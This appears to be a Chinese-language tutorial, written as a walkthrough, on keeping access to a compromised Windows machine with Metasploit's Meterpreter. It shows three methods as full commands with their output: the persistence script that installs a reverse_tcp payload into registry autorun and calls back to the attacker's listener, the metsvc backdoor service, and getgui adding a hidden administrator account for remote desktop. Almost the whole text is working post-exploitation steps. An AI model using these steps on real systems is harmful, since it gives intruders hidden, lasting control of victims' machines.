Meterpreter后门

方法一:persistence方法

meterpreter > run  persistence -h
 Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A                Automatically start a matching multi/handler to connect to the agent
         -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
         -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
         -S                Automatically start the agent on boot as a service (with SYSTEM privileges)
         -T <opt>  Alternate executable template to use
         -U                Automatically start the agent when the User logs on
         -X                Automatically start the agent when the system boots
         -h                This help menu
         -i <opt>  The interval in seconds between each connection attempt
         -p <opt>  The port on the remote host where Metasploit is listening
         -r <opt>  The IP of the system running Metasploit listening for the connect back
meterpreter >
执行


meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129
 [*] Running Persistance Script
 [*] Resource file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
 [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
 [*] Persistent agent script is 148439 bytes long
 [+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
 [*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
 [+] Agent executed with PID 2916
 [*] Installing into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ
 [+] Installed into autorun as HKLMSoftwareMicrosoftWindowsCurrentVersionRunHstWtPyXHYnhQ
 meterpreter >


现在退出服务器 
重新配置监听器


msf > use multi/handler
 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
 PAYLOAD => windows/meterpreter/reverse_tcp
 msf exploit(handler) > set LHOST 192.168.111.129
 LHOST => 192.168.111.129
 msf exploit(handler) > set LPORT 2241
 LPORT => 2241
 msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.111.129:2241
 [*] Starting the payload handler...
 [*] Sending stage (769024 bytes) to 192.168.111.133
 [*] Meterpreter session 1 opened (192.168.111.129:2241 -> 192.168.111.133:49159) at 2014-03-13 23:01:55 +0800
meterpreter >

方法二:metsvc

meterpreter > run metsvc
 [*] Creating a meterpreter service on port 31337
 [*] Creating a temporary installation directory C:UsersADMINI~1AppDataLocalTempHzWbqqRpuBlxn...
 [*]  >> Uploading metsrv.x86.dll...
 [*]  >> Uploading metsvc-server.exe...
 [*]  >> Uploading metsvc.exe...
 [*] Starting the service...
      * Installing service metsvc
  * Starting service
 Service metsvc successfully installed.
meterpreter >


metsvc后门安装成功,接下来是连接


root@Kali:~# msfconsole 
           ,                          ,
          /                                 
         ((__---,,,---__))
                 (_) O O (_)_________
                          _ /                                |
                          o_o         M S F        | 
                                                 _____  |  *
                                          |||        WW|||
                                          |||          |||
Using notepad to track pentests? Have Metasploit Pro report on hosts,
 services, sessions and evidence -- type 'go_pro' to launch it now.
=[ metasploit v4.8.1-2013120401 [core:4.8 api:1.0]
 + -- --=[ 1239 exploits - 755 auxiliary - 207 post
 + -- --=[ 324 payloads - 31 encoders - 8 nops
msf > use multi/handler 
 msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
 PAYLOAD => windows/metsvc_bind_tcp
 msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
         ----  ---------------  --------  -----------
Payload options (windows/metsvc_bind_tcp):
Name                Current Setting  Required  Description
         ----                ---------------  --------  -----------
         EXITFUNC  process                         yes                 Exit technique: seh, thread, process, none
         LPORT          4444                                 yes                 The listen port
         RHOST                                                         no                  The target address
Exploit target:
Id  Name
         --  ----
         0        Wildcard Target
msf exploit(handler) > set RHOST 192.168.111.133
 RHOST => 192.168.111.133
 msf exploit(handler) > set LPORT 31337
 LPORT => 31337
 msf exploit(handler) > exploit
[*] Started bind handler
 [*] Starting the payload handler...
 [*] Meterpreter session 1 opened (192.168.111.129:49313 -> 192.168.111.133:31337) at 2014-03-13 23:12:54 +0800
meterpreter >

方法三: 类似于添加账户3389远程连接

meterpreter > run getgui -u zero -p haizeiwang123_
 [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
 [*] Carlos Perez carlos_perez@darkoperator.com
 [*] Setting user account for logon
 [*]     Adding User: zero with Password: haizeiwang123_
 [*]     Hiding user from Windows Login screen
 [*]     Adding User: zero to local group 'Remote Desktop Users'
 [*]     Adding User: zero to local group 'Administrators'
 [*] You can now login with the created user
 [*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20140314.4134.rc
 meterpreter >